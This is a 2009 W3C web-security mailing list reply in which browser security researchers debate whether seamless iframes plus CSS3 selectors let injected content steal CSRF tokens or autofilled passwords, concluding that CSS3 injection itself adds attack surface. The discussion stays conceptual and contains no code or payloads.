W3C home > Mailing lists > Public > public-web-security@w3.org > December 2009

Re: Seamless iframes + CSS3 selectors = bad idea

From: Adam Barth <w3c@adambarth.com>
Date: Sat, 5 Dec 2009 10:17:35 -0800
Message-ID: <7789133a0912051017k778346a2wf8b849bc2e069870@mail.gmail.com>
To: "sird@rckc.at" <sird@rckc.at>
Cc: Collin Jackson <w3c@collinjackson.com>, public-web-security@w3.org
I think Collin's point about the CSRF tokens is that they tend to be
on every page anyway.


On Sat, Dec 5, 2009 at 10:16 AM, sird@rckc.at <sird@rckc.at> wrote:
> collin. this attack allows you to steal nonces, making csrf protections less
> efficient. seamless iframes make this work on ALL the domain/origin..
> greetings.
> On Dec 6, 2009 2:05 AM, "Collin Jackson" <w3c@collinjackson.com> wrote:
> A few thoughts:
> * The password stealing attack can already be accomplished using the
> iframe to create a login page and prompting the user to type their
> password. It's not necessary to use CSS3 or seamless.
> * If the password manager is used, CSS3 + seamless lets you steal the
> password without user interaction.
> * However, if you can inject arbitrary CSS3 and a seamless iframe into
> a page, there's a good chance you can inject a password field, so this
> password manager attack doesn't require seamless, just CSS3.
> * Many webapps include a CSRF token in every page as a hidden form
> field. If the page that allows CSS3 injection includes such a token,
> you don't need seamless iframes to steal the token.
> It seems like CSS3 is adding a lot of attack surface, sites may need
> to block arbitrary CSS3 injection regardless of seamless. That is
> unfortunate since browser vendors have been removing expression,
> -moz-binding, and other features that make CSS injection dangerous.
> On Sat, Dec 5, 2009 at 8:54 AM, Adam Barth <w3c@adambarth.com> wrote: > I
> see.  The issue is that t...
Received on Saturday, 5 December 2009 18:18:28 UTC

This archive was generated by hypermail 2.3.1 : Tuesday, 6 January 2015 20:26:17 UTC